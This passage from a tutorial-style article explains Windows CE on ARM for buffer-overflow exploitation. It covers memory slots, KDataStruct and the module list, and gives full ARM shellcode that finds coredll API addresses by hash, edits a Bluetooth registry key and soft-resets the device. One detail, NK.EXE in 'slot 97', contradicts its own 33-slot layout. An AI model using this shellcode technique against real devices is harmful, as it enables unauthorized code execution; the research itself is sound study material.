    In ARM architecture v3 and above, there are 30 general-purpose 32-bit
registers, the program counter (pc) register, the Current Program Status
Register (CPSR) and five Saved Program Status Registers (SPSRs). Fifteen
general-purpose registers are visible at any one time, depending on the
current processor mode. The visible general-purpose registers are r0 to
r14.

    By convention, r13 is used as a stack pointer (sp) in ARM assembly
language. The C and C++ compilers always use r13 as the stack pointer.

    In User mode and System mode, r14 is used as a link register (lr) to
store the return address when a subroutine call is made. It can also be
used as a general-purpose register if the return address is stored on the
stack.

    The program counter is accessed as r15 (pc). It is incremented by
four bytes for each instruction in ARM state, or by two bytes in Thumb
state. Branch instructions load the destination address into the pc
register. You can also load the pc register directly using data operation
instructions. This feature is different from other processors and it is
useful while writing shellcode.

--[ 4 - Windows CE Memory Management

    Understanding memory management is very important for buffer overflow
exploits. The memory management of Windows CE is very different from
other operating systems, even other Windows systems.

    Windows CE uses ROM (read only memory) and RAM (random access
memory). The ROM stores the entire operating system, as well as the
applications that are bundled with the system.
In this sense, the ROM in a Windows CE system is like a small read-only
hard disk. The data in ROM can be maintained without battery power.

    ROM-based DLL files can be designated as Execute in Place (XIP). XIP
is a new feature of Windows. That is, they're executed directly from the
ROM instead of being loaded into program RAM and then executed. It is a
big advantage for embedded systems: the DLL code doesn't take up valuable
program RAM and it doesn't have to be copied into RAM before it's
launched, so it takes less time to start an application. DLL files that
aren't in ROM but are contained in the object store or on a Flash memory
storage card aren't executed in place; they're copied into the RAM and
then executed.

    The RAM in a Windows CE system is divided into two areas: program
memory and object store.

    The object store can be considered something like a permanent virtual
RAM disk. Unlike the RAM disks on a PC, the object store maintains the
files stored in it even if the system is turned off. This is the reason
that Windows CE devices typically have a main battery and a backup
battery: they provide power for the RAM to maintain the files in the
object store. Even when the user hits the reset button, the Windows CE
kernel starts up looking for a previously created object store in RAM and
uses that store if it finds one.

    The other area of the RAM is used for program memory. Program memory
is used like the RAM in personal computers: it stores the heaps and
stacks for the applications that are running. The boundary between the
object store and the program RAM is adjustable; the user can move the
dividing line using the System Control Panel applet.

    Windows CE is a 32-bit operating system, so it supports a 4GB virtual
address space.
The layout is as follows:

+----------------------------------------+ 0xFFFFFFFF
|   |   |  Kernel Virtual Address:       |
|   | 2 |  KPAGE Trap Area,              |
|   | G |  KDataStruct, etc              |
|   | B |  ...                           |
|   |   |--------------------------------+ 0xF0000000
| 4 | K |  Static Mapped Virtual Address |
| G | E |  ...                           |
| B | R |  ...                           |
|   | N |--------------------------------+ 0xC4000000
| V | E |  NK.EXE                        |
| I | L |--------------------------------+ 0xC2000000
| R |   |  ...                           |
| T |   |  ...                           |
| U |---|--------------------------------+ 0x80000000
| A |   |  Memory Mapped Files           |
| L | 2 |  ...                           |
|   | G |--------------------------------+ 0x42000000
| A | B |  Slot 32 Process 32            |
| D |   |--------------------------------+ 0x40000000
| D | U |  ...                           |
| R | S |--------------------------------+ 0x08000000
| E | E |  Slot 3  DEVICE.EXE            |
| S | R |--------------------------------+ 0x06000000
| S |   |  Slot 2  FILESYS.EXE           |
|   |   |--------------------------------+ 0x04000000
|   |   |  Slot 1  XIP DLLs              |
|   |   |--------------------------------+ 0x02000000
|   |   |  Slot 0  Current Process       |
+---+---+--------------------------------+ 0x00000000

    The upper 2GB is kernel space, used by the system for its own data,
and the lower 2GB is user space. The memory from 0x42000000 to below
0x80000000 is used for large memory allocations, such as memory-mapped
files; the object store is in here. The memory from 0 to below 0x42000000
is divided into 33 slots, each of which is 32MB.

    Slot 0 is very important; it's for the currently running process.
The virtual address space layout of slot 0 is as follows:

+---+------------------------------------+ 0x02000000
|   |     DLL Virtual Memory Allocations |
| S |   +--------------------------------|
| L |   |  ROM DLLs:R/W Data             |
| O |   |--------------------------------|
| T |   |  RAM DLL+OverFlow ROM DLL:     |
| 0 |   |  Code+Data                     |
|   |   +--------------------------------|
| C +------+-----------------------------|
| U        |                  A          |
| R        V                  |          |
| R +-------------------------+----------|
| E |  General Virtual Memory Allocations|
| N |   +--------------------------------|
| T |   |  Process VirtualAlloc() calls  |
|   |   |--------------------------------|
| P |   |       Thread Stack             |
| R |   |--------------------------------|
| O |   |       Process Heap             |
| C |   |--------------------------------|
| E |   |       Thread Stack             |
| S |---+--------------------------------|
| S |      Process Code and Data         |
|   |------------------------------------+ 0x00010000
|   |    Guard Section(64K)+UserKInfo    |
+---+------------------------------------+ 0x00000000

    The first 64 KB is reserved by the OS. The process' code and data are
mapped from 0x00010000, followed by stacks and heaps. DLLs are loaded at
the top of the address space. One of the new features of Windows is the
expansion of an application's virtual address space from 32 MB, in
earlier versions of Windows CE, to 64 MB, because Slot 1 is used as XIP.

--[ 5 - Windows CE Processes and Threads

    Windows CE treats processes in a different way from other Windows
systems. Windows CE limits itself to 32 processes running at any one
time.
    When the system starts, at least four processes are created: NK.EXE,
which provides the kernel service, it's always in slot 97; FILESYS.EXE,
which provides the file system service, it's always in slot 2;
DEVICE.EXE, which loads and maintains the device drivers for the system,
it's normally in slot 3; and GWES.EXE, which provides the GUI support,
it's normally in slot 4. Other processes are also started, such as
EXPLORER.EXE.

    Shell is an interesting process because it's not even in the ROM.
SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
The only way to load it is by connecting the system to the PC debugging
station so that the file can be automatically downloaded from the PC.
When you use Platform Builder to debug the Windows CE system, SHELL.EXE
will be loaded into the slot after FILESYS.EXE.

    Threads under Windows CE are similar to threads under other Windows
systems. Each process has at least a primary thread associated with it
upon starting, even if it never explicitly created one. A process can
create any number of additional threads; the number is only limited by
available memory.

    Each thread belongs to a particular process and shares the same
memory space. But SetProcPermissions(-1) gives the current thread access
to any process. Each thread has an ID, a private stack and a set of
registers. The stack size of all threads created within a process is set
by the linker when the application is compiled.

    The IDs of a process and a thread in Windows CE are the handles of
the corresponding process and thread. It's funny, but it's useful while
programming.

    When a process is loaded, the system will assign the next available
slot to it. DLLs are loaded into the slot, followed by the stack and the
default process heap; after this, the process is executed.

    When a process' thread is scheduled, the system will copy its slot
into slot 0. It isn't a real copy operation; it seems to be just mapped
into slot 0.
This is mapped back to the original slot allocated to the process if the
process becomes inactive. The kernel, file system and windowing system
all run in their own slots.

    Processes allocate a stack for each thread; the default size is
64KB, depending on the link parameters when the program is compiled. The
top 2KB is used to guard against stack overflow; we can't destroy this
memory, otherwise the system will freeze. The remainder is available for
use.

    Variables declared inside functions are allocated on the stack. A
thread's stack memory is reclaimed when it terminates.

--[ 6 - Windows CE API Address Search Technology

    We must have a shellcode that runs under Windows CE before
exploiting. Windows CE implements Win32 compatibility. Coredll provides
the entry points for most APIs supported by Windows CE, so it is loaded
by every process. The coredll.dll is just like the kernel32.dll and
ntdll.dll of other Win32 systems. We have to search for the necessary API
addresses in coredll.dll and then use these APIs to implement our
shellcode. The traditional method to implement shellcode under other
Win32 systems is to locate the base address of kernel32.dll via the PEB
structure and then search for API addresses via the PE header.

    Firstly, we have to locate the base address of coredll.dll. Is there
a structure like the PEB under Windows CE? The answer is yes. KDataStruct
is an important kernel structure that can be accessed from user mode
using the fixed address PUserKData, and it keeps important system data,
such as the module list, kernel heap, and API set pointer table
(SystemAPISets).
    KDataStruct is defined in nkarm.h:

// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h
struct KDataStruct {
    LPDWORD lpvTls;         /* 0x000 Current thread local storage pointer */
    HANDLE  ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */
    char    bResched;       /* 0x084 reschedule flag */
    char    cNest;          /* 0x085 kernel exception nesting */
    char    bPowerOff;      /* 0x086 TRUE during "power off" processing */
    char    bProfileOn;     /* 0x087 TRUE if profiling enabled */
    ulong   unused;         /* 0x088 unused */
    ulong   rsvd2;          /* 0x08c was DiffMSec */
    PPROCESS pCurPrc;       /* 0x090 ptr to current PROCESS struct */
    PTHREAD pCurThd;        /* 0x094 ptr to current THREAD struct */
    DWORD   dwKCRes;        /* 0x098  */
    ulong   handleBase;     /* 0x09c handle table base address */
    PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */
    LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */
    LPVOID  alpvIntrData[SYSINTR_MAX_DEVICES];  /* 0x220 */
    ulong   pAPIReturn;     /* 0x2a0 direct API return address for kernel mode */
    uchar   *pMap;          /* 0x2a4 ptr to MemoryMap array */
    DWORD   dwInDebugger;   /* 0x2a8 !0 when in debugger */
    PTHREAD pCurFPUOwner;   /* 0x2ac current FPU owner */
    PPROCESS pCpuASIDPrc;   /* 0x2b0 current ASID proc */
    long    nMemForPT;      /* 0x2b4 - Memory used for PageTables */
    long    alPad[18];      /* 0x2b8 - padding */
    DWORD   aInfo[32];      /* 0x300 - misc. kernel info */
    // WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h
    #define KINX_PROCARRAY  0   /* 0x300 address of process array */
    #define KINX_PAGESIZE   1   /* 0x304 system page size */
    #define KINX_PFN_SHIFT  2   /* 0x308 shift for page # in PTE */
    #define KINX_PFN_MASK   3   /* 0x30c mask for page # in PTE */
    #define KINX_PAGEFREE   4   /* 0x310 # of free physical pages */
    #define KINX_SYSPAGES   5   /* 0x314 # of pages used by kernel */
    #define KINX_KHEAP      6   /* 0x318 ptr to kernel heap array */
    #define KINX_SECTIONS   7   /* 0x31c ptr to SectionTable array */
    #define KINX_MEMINFO    8   /* 0x320 ptr to system MemoryInfo struct */
    #define KINX_MODULES    9   /* 0x324 ptr to module list */
    #define KINX_DLL_LOW   10   /* 0x328 lower bound of DLL shared space */
    #define KINX_NUMPAGES  11   /* 0x32c total # of RAM pages */
    #define KINX_PTOC      12   /* 0x330 ptr to ROM table of contents */
    #define KINX_KDATA_ADDR 13  /* 0x334 kernel mode version of KData */
    #define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */
    #define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */
    #define KINX_PENDEVENTS 16  /* 0x340 bit mask for pending interrupt events */
    #define KINX_KERNRESERVE 17 /* 0x344 number of kernel reserved pages */
    #define KINX_API_MASK 18    /* 0x348 bit mask for registered api sets */
    #define KINX_NLS_CP 19      /* 0x34c hiword OEM code page, loword ANSI code page */
    #define KINX_NLS_SYSLOC 20  /* 0x350 Default System locale */
    #define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */
    #define KINX_HEAP_WASTE 22  /* 0x358 Kernel heap wasted space */
    #define KINX_DEBUGGER 23    /* 0x35c For use by debugger for protocol communication */
    #define KINX_APISETS 24     /* 0x360 APIset pointers */
    #define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages */
    #define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */
    #define KINX_NKSECTION  27  /* 0x36c Address of NKSection */
    #define KINX_PWR_EVTS   28  /* 0x370 Events to be set after power on */
    #define KINX_NKSIG     31   /* 0x37c last entry of KINFO -- signature when NK is ready */
    #define NKSIG          0x4E4B5347       /* signature "NKSG" */
                        /* 0x380 - interlocked api code */
                        /* 0x400 - end */
};  /* KDataStruct */

/* High memory layout
 *
 * This structure is mapped in at the end of the 4GB virtual
 * address space.
 *
 *  0xFFFD0000 - first level page table (uncached) (2nd half is r/o)
 *  0xFFFD4000 - disabled for protection
 *  0xFFFE0000 - second level page tables (uncached)
 *  0xFFFE4000 - disabled for protection
 *  0xFFFF0000 - exception vectors
 *  0xFFFF0400 - not used (r/o)
 *  0xFFFF1000 - disabled for protection
 *  0xFFFF2000 - r/o (physical overlaps with vectors)
 *  0xFFFF2400 - Interrupt stack (1k)
 *  0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)
 *  0xFFFF3000 - disabled for protection
 *  0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack
 *               & FIQ stack)
 *  0xFFFF4900 - Abort stack (2k - 256 bytes)
 *  0xFFFF5000 - disabled for protection
 *  0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)
 *  0xFFFF6800 - FIQ stack (256 bytes)
 *  0xFFFF6900 - r/o (physical memory overlaps with Abort stack)
 *  0xFFFF7000 - disabled
 *  0xFFFFC000 - kernel stack
 *  0xFFFFC800 - KDataStruct
 *  0xFFFFCC00 - disabled for protection (2nd level page table for
 *               0xFFF00000)
 */

    The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor,
and 0x00005800 on other CPUs. The last member of KDataStruct is aInfo. It
is at offset 0x300 from the start address of the KDataStruct structure.
Member aInfo is a DWORD array; its index 9 (KINX_MODULES, defined in 
pkfuncs.h) holds a pointer to the module list. So offset 0x324 from 
0xFFFFC800 is the pointer to the module list.

Now, let's look at the Module structure. I marked the offsets of the 
Module structure as follows:

// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h
typedef struct Module {
    LPVOID      lpSelf;                 /* 0x00 Self pointer for validation */
    PMODULE     pMod;                   /* 0x04 Next module in chain */
    LPWSTR      lpszModName;            /* 0x08 Module name */
    DWORD       inuse;                  /* 0x0c Bit vector of use */
    DWORD       calledfunc;             /* 0x10 Called entry but not exit */
    WORD        refcnt[MAX_PROCESSES];  /* 0x14 Reference count per process*/
    LPVOID      BasePtr;                /* 0x54 Base pointer of dll load (not 0 based) */
    DWORD       DbgFlags;               /* 0x58 Debug flags */
    LPDBGPARAM  ZonePtr;                /* 0x5c Debug zone pointer */
    ulong       startip;                /* 0x60 0 based entrypoint */
    openexe_t   oe;                     /* 0x64 Pointer to executable file handle */
    e32_lite    e32;                    /* 0x74 E32 header */
    // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
      typedef struct e32_lite {           /* PE 32-bit .EXE header            */
          unsigned short  e32_objcnt;     /* 0x74 Number of memory objects    */
          BYTE            e32_cevermajor; /* 0x76 version of CE built for     */
          BYTE            e32_ceverminor; /* 0x77 version of CE built for     */
          unsigned long   e32_stackmax;   /* 0x78 Maximum stack size          */
          unsigned long   e32_vbase;      /* 0x7c Virtual base address of module */
          unsigned long   e32_vsize;      /* 0x80 Virtual size of the entire image */
          unsigned long   e32_sect14rva;  /* 0x84 section 14 rva */
          unsigned long   e32_sect14size; /* 0x88 section 14 size */
          struct info e32_unit[LITE_EXTRA]; /* 0x8c Array of extra info units */
            // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
            struct info {                   /* Extra information header block */
                unsigned long   rva;        /* Virtual relative address of info */
                unsigned long   size;       /* Size of information block      */
            }
            // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
            #define EXP             0       /* 0x8c Export table position     */
            #define IMP             1       /* 0x94 Import table position     */
            #define RES             2       /* 0x9c Resource table position   */
            #define EXC             3       /* 0xa4 Exception table position  */
            #define SEC             4       /* 0xac Security table position   */
            #define FIX             5       /* 0xb4 Fixup table position      */
            #define LITE_EXTRA      6       /* Only first 6 used by NK */
      } e32_lite, *LPe32_list;
    o32_lite    *o32_ptr;               /* 0xbc O32 chain ptr */
    DWORD       dwNoNotify;             /* 0xc0 1 bit per process, set if notifications disabled */
    WORD        wFlags;                 /* 0xc4 */
    BYTE        bTrustLevel;            /* 0xc6 */
    BYTE        bPadding;               /* 0xc7 */
    PMODULE     pmodResource;           /* 0xc8 module that contains the resources */
    DWORD       rwLow;                  /* 0xcc base address of RW section for ROM DLL */
    DWORD       rwHigh;                 /* 0xd0 high address RW section for ROM DLL */
    PGPOOL_Q    pgqueue;                /* 0xcc list of the page owned by the module */
} Module;

The Module structure is defined in kernel.h. 
The third member of the Module structure is lpszModName, the module name 
string pointer, at offset 0x08 from the start of the structure. The module 
name is a unicode string. The second member is pMod, a pointer to the next 
module in the chain. So we can locate the coredll module by comparing the 
unicode string of its name.

At offset 0x74 from the start of the Module structure lies the e32 member, 
an e32_lite structure. Let's look at the e32_lite structure, which is 
defined in pehdr.h. In the e32_lite structure, the member e32_vbase gives 
us the virtual base address of the module; it is at offset 0x7c from the 
start of the Module structure. We also notice the member 
e32_unit[LITE_EXTRA], an array of info structures. LITE_EXTRA is defined 
as 6 at the head of pehdr.h; only the first 6 entries are used by NK, and 
the first one is the export table position. So offset 0x8c from the start 
of the Module structure holds the virtual relative address of the module's 
export table.

Now we have both the virtual base address of coredll.dll and the virtual 
relative address of its export table.

I wrote the following small program to list all modules of the system:

; SetProcessorMode.s

    AREA    |.text|, CODE, ARM

    EXPORT    |SetProcessorMode|

|SetProcessorMode| PROC
    mov     r1, lr     ; different modes use different lr - save it
    msr     cpsr_c, r0 ; assign control bits of CPSR
    mov     pc, r1     ; return

    END

// list.cpp
/* ...
01F60000 coredll.dll
*/

#include "stdafx.h"

extern "C" void __stdcall SetProcessorMode(DWORD pMode);

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    FILE *fp;
    unsigned int KDataStruct = 0xFFFFC800;
    void *Modules     = NULL,
         *BaseAddress = NULL,
         *DllName     = NULL;

    // switch to user mode
    //SetProcessorMode(0x10);

    if ( (fp = fopen("\\modules.txt", "w")) == NULL )
    {
        return 1;
    }

    // aInfo[KINX_MODULES]
    Modules = *( ( void ** )(KDataStruct + 0x324));

    while (Modules) {
        BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );
        DllName     = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );

        fprintf(fp, "%08X %ls\n", BaseAddress, DllName);

        Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );
    }

    fclose(fp);
    return(EXIT_SUCCESS);
}

In my environment, the Module structure is at 0x8F453128, which lies in 
kernel space. Most Pocket PC ROMs were built with the Enable Full Kernel 
Mode option, so all applications appear to run in kernel mode. The first 
5 bits of the Psr register are 0x1F when debugging, which means the ARM 
processor runs in system mode. These values are defined in nkarm.h:

// ARM processor modes
#define USER_MODE   0x10    // 0b10000
#define FIQ_MODE    0x11    // 0b10001
#define IRQ_MODE    0x12    // 0b10010
#define SVC_MODE    0x13    // 0b10011
#define ABORT_MODE  0x17    // 0b10111
#define UNDEF_MODE  0x1b    // 0b11011
#define SYSTEM_MODE 0x1f    // 0b11111

I wrote a small function in assembly to switch the processor mode, 
because EVC doesn't support inline assembly. The program won't get the 
values of BaseAddress and DllName when I switch the processor to user 
mode; it raises an access violation exception. 
Using this program (without changing the processor mode), I found the 
virtual base address of coredll.dll to be 0x01F60000. But this address is 
invalid when inspected in the EVC debugger; the valid data starts at 
0x01F61000. I think Windows CE skips loading the header of DLL files, 
perhaps to save memory space or load time.

Since we have the virtual base address of coredll.dll and the virtual 
relative address of its export table, we can obtain an API's address by 
repeatedly comparing API names via the IMAGE_EXPORT_DIRECTORY structure. 
The IMAGE_EXPORT_DIRECTORY structure is just like that of other Win32 
systems, defined in winnt.h:

// WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h
typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;        /* 0x00 */
    DWORD   TimeDateStamp;          /* 0x04 */
    WORD    MajorVersion;           /* 0x08 */
    WORD    MinorVersion;           /* 0x0a */
    DWORD   Name;                   /* 0x0c */
    DWORD   Base;                   /* 0x10 */
    DWORD   NumberOfFunctions;      /* 0x14 */
    DWORD   NumberOfNames;          /* 0x18 */
    DWORD   AddressOfFunctions;     // 0x1c RVA from base of image
    DWORD   AddressOfNames;         // 0x20 RVA from base of image
    DWORD   AddressOfNameOrdinals;  // 0x24 RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;


--[ 7 - The Shellcode for Windows CE

There are some things to notice before writing shellcode for Windows CE. 
Windows CE uses r0-r3 for the first through fourth parameters of an API; 
if an API takes more than four parameters, Windows CE passes the rest on 
the stack. So we must be careful when writing shellcode, because the 
shellcode itself stays in the stack. 
The test.asm is our shellcode:

; Idea from WinCE4.Dust written by Ratter/29A
;
; API Address Search
;
;
; armasm test.asm
; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

    CODE32

    EXPORT  WinMainCRTStartup

    AREA    .text, CODE, ARM

test_start

; r11 - base pointer
test_code_start   PROC
    bl      get_export_section

    mov     r2, #4          ; functions number
    bl      find_func

    sub     sp, sp, #0x89, 30 ; weird after buffer overflow

    add     r0, sp, #8
    str     r0, [sp]
    mov     r3, #2
    mov     r2, #0
    adr     r1, key
    mov     r0, #0xA, 2
    mov     lr, pc
    ldr     pc, [r8, #-12] ; RegOpenKeyExW

    mov     r0, #1
    str     r0, [sp, #0xC]
    mov     r3, #4
    str     r3, [sp, #4]
    add     r1, sp, #0xC
    str     r1, [sp]
    ;mov     r2, #0
    adr     r1, val
    ldr     r0, [sp, #8]
    mov     lr, pc
    ldr     pc, [r8, #-8]  ; RegSetValueExW

    ldr     r0, [sp, #8]
    mov     lr, pc
    ldr     pc, [r8, #-4]  ; RegCloseKey

    adr     r0, sf
    ldr     r0, [r0]
    ;ldr     r0, =0x0101003c
    mov     r1, #0
    mov     r2, #0
    mov     r3, #0
    mov     lr, pc
    ldr     pc, [r8, #-16] ; KernelIoControl

; basic wide string compare
wstrcmp   PROC
wstrcmp_iterate
    ldrh    r2, [r0], #2
    ldrh    r3, [r1], #2

    cmp     r2, #0
    cmpeq   r3, #0
    moveq   pc, lr

    cmp     r2, r3
    beq     wstrcmp_iterate

    mov     pc, lr
    ENDP

; output:
;  r0 - coredll base addr
;  r1 - export section addr
get_export_section   PROC
    mov     r11, lr
    adr     r4, kd
    ldr     r4, [r4]
    ;ldr     r4, =0xffffc800     ; KDataStruct
    ldr     r5, =0x324          ; aInfo[KINX_MODULES]

    add     r5, r4, r5
    ldr     r5, [r5]

    ; r5 now points to first module

    mov     r6, r5
    mov     r7, #0

iterate
    ldr     r0, [r6, #8]        ; get dll name
    adr     r1, coredll
    bl      wstrcmp             ; compare with coredll.dll

    ldreq   r7, [r6, #0x7c]     ; get dll base
    ldreq   r8, [r6, #0x8c]     ; get export section rva

    add     r9, r7, r8
    beq     got_coredllbase     ; is it what we're looking for?

    ldr     r6, [r6, #4]
    cmp     r6, #0
    cmpne   r6, r5
    bne     iterate             ; nope, go on

got_coredllbase
    mov     r0, r7
    add     r1, r8, r7          ; yep, we've got imagebase
                                ; and export section pointer

    mov     pc, r11
    ENDP

; r0 - coredll base addr
; r1 - export section addr
; r2 - function name addr
find_func   PROC
    adr     r8, fn
find_func_loop
    ldr     r4, [r1, #0x20]     ; AddressOfNames
    add     r4, r4, r0

    mov     r6, #0              ; counter

find_start
    ldr     r7, [r4], #4
    add     r7, r7, r0          ; function name pointer
    ;mov     r8, r2             ; find function name

    mov     r10, #0
hash_loop
    ldrb    r9, [r7], #1
    cmp     r9, #0
    beq     hash_end
    add     r10, r9, r10, ROR #7
    b       hash_loop

hash_end
    ldr     r9, [r8]
    cmp     r10, r9 ; compare the hash
    addne   r6, r6, #1
    bne     find_start

    ldr     r5, [r1, #0x24]     ; AddressOfNameOrdinals
    add     r5, r5, r0
    add     r6, r6, r6
    ldrh    r9, [r5, r6]        ; Ordinals
    ldr     r5, [r1, #0x1c]     ; AddressOfFunctions
    add     r5, r5, r0
    ldr     r9, [r5, r9, LSL #2]; function address rva
    add     r9, r9, r0          ; function address

    str     r9, [r8], #4
    subs    r2, r2, #1
    bne     find_func_loop

    mov     pc, lr
    ENDP

kd  DCB     0x00, 0xc8, 0xff, 0xff ; 0xffffc800
sf  DCB     0x3c, 0x00, 0x01, 0x01 ; 0x0101003c

fn  DCB     0xe7, 0x9d, 0x3a, 0x28 ; KernelIoControl
    DCB     0x51, 0xdf, 0xf7, 0x0b ; RegOpenKeyExW
    DCB     0xc0, 0xfe, 0xc0, 0xd8 ; RegSetValueExW
    DCB     0x83, 0x17, 0x51, 0x0e ; RegCloseKey

key DCB    "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0
    DCB    "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0
    DCB    "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0
    DCB    "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0
    DCB    "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0

val DCB    "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0
    DCB    "e", 0x0, 0x0, 0x0

coredll DCB    "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
        DCB    ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0

    ALIGN   4
    LTORG
test_end

WinMainCRTStartup PROC
    b     test_code_start
    ENDP

    END

This shellcode consists of three parts. First, it calls the 
get_export_section function to obtain the virtual base address of coredll 
and the virtual relative address of its export table; r0 and r1 hold 
them. Second, it calls the find_func function to obtain the API addresses 
through the IMAGE_EXPORT_DIRECTORY structure, storing each API address 
over its own hash value. The last part is the payload of our shellcode: 
it changes the registry value 
HKLM\SOFTWARE\Widcomm\BtConfig\General\StackMode to 1 and then uses 
KernelIoControl to soft-restart the system.

Windows CE.NET provides BthGetMode and BthSetMode to get and set the 
bluetooth state. But HP IPAQs use the Widcomm stack, which has its own 
API, so BthSetMode can't enable bluetooth on an IPAQ. Well, there is 
another way to enable bluetooth on IPAQs (my PDA is an HP1940): just 
change HKLM\SOFTWARE\Widcomm\BtConfig\General\StackMode to 1 and reset 
the PDA, and bluetooth will be on after the system restarts. This method 
is not pretty, but it works.

Well, let's look at the get_export_section function. Why did I comment 
out the "ldr r4, =0xffffc800" instruction? We must pay attention to the 
ARM assembly language's LDR pseudo-instruction. It can load a register 
with a 32-bit constant value or an address. 
The instruction "ldr r4, =0xffffc800" becomes "ldr r4, [pc, #0x108]" in 
the EVC debugger, where the literal-pool offset depends on the program. 
So the r4 register won't get the value 0xffffc800 in shellcode, and the 
shellcode will fail. The instruction "ldr r5, =0x324" becomes 
"mov r5, #0xC9, 30" in the EVC debugger, which is fine when the shellcode 
executes. The simple solution is to embed the large constant among the 
shellcode bytes, use the ADR pseudo-instruction to load the value's 
address into a register, and then read the memory into a register.

To save size, we can use a hash technique to encode the API names. Each 
API name is encoded into 4 bytes. The hash technique comes from LSD's 
Win32 Assembly Components.

The compile method is as follows:

armasm test.asm
link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

You must install the EVC environment first. After that, we can obtain the 
necessary opcodes from the EVC debugger, IDA Pro, or a hex editor.


--[ 8 - System Call

First, let's look at the implementation of an API in coredll.dll:

.text:01F75040                 EXPORT PowerOffSystem
.text:01F75040 PowerOffSystem                          ; CODE XREF: SetSystemPowerState+58p
.text:01F75040                 STMFD   SP!, {R4,R5,LR}
.text:01F75044                 LDR     R5, =0xFFFFC800
.text:01F75048                 LDR     R4, =unk_1FC6760
.text:01F7504C                 LDR     R0, [R5]        ; UTlsPtr
.text:01F75050                 LDR     R1, [R0,#-0x14] ; KTHRDINFO
.text:01F75054                 TST     R1, #1
.text:01F75058                 LDRNE   R0, [R4]        ; 0x8004B138 ppfnMethods
.text:01F7505C                 CMPNE   R0, #0
.text:01F75060                 LDRNE   R1, [R0,#0x13C] ; 0x8006C92C SC_PowerOffSystem
.text:01F75064                 LDREQ   R1, =0xF000FEC4 ; trap address of SC_PowerOffSystem
.text:01F75068                 MOV     LR, PC
.text:01F7506C                 MOV     PC, R1
.text:01F75070                 LDR     R3, [R5]
.text:01F75074                 LDR     R0, [R3,#-0x14]
.text:01F75078                 TST     R0, #1
.text:01F7507C                 LDRNE   R0, [R4]
.text:01F75080                 CMPNE   R0, #0
.text:01F75084                 LDRNE   R0, [R0,#0x25C] ; SC_KillThreadIfNeeded
.text:01F75088                 MOVNE   LR, PC
.text:01F7508C                 MOVNE   PC, R0
.text:01F75090                 LDMFD   SP!, {R4,R5,PC}
.text:01F75090 ; End of function PowerOffSystem

Debugging into this API, we find that the system checks KTHRDINFO first. 
This value is initialized in the MDCreateMainThread2 function of 
PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:

...
    if (kmode || bAllKMode) {
        pTh->ctx.Psr = KERNEL_MODE;
        KTHRDINFO (pTh) |= UTLS_INKMODE;
    } else {
        pTh->ctx.Psr = USER_MODE;
        KTHRDINFO (pTh) &= ~UTLS_INKMODE;
    }
...

If the application runs in kernel mode, this value is set to 1; otherwise 
it is 0. All Pocket PC applications run in kernel mode, so the system 
takes the "LDRNE R0, [R4]" path. In my environment, R0 got 0x8004B138, 
the ppfnMethods pointer of SystemAPISets[SH_WIN32], and execution flowed 
to "LDRNE R1, [R0,#0x13C]". The offset 0x13C (0x13C/4 = 0x4F = 79) 
corresponds to the index into Win32Methods, defined in 
PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:

const PFNVOID Win32Methods[] = {
...
    (PFNVOID)SC_PowerOffSystem,             // 79
...
};

So R1 got the address of SC_PowerOffSystem, which is implemented in the 
kernel. The instruction "LDREQ R1, =0xF000FEC4" has no effect when the 
application runs in kernel mode. The address 0xF000FEC4 is the system 
call used by user mode. Some APIs use the system call directly, such as 
SetKMode:

.text:01F756C0                 EXPORT SetKMode
.text:01F756C0 SetKMode
.text:01F756C0
.text:01F756C0 var_4           = -4
.text:01F756C0
.text:01F756C0                 STR     LR, [SP,#var_4]!
.text:01F756C4                 LDR     R1, =0xF000FE50
.text:01F756C8                 MOV     LR, PC
.text:01F756CC                 MOV     PC, R1
.text:01F756D0                 LDMFD   SP!, {PC}

Windows CE doesn't use ARM's SWI instruction to implement system calls; 
it implements them in a different way. A system call is made to an 
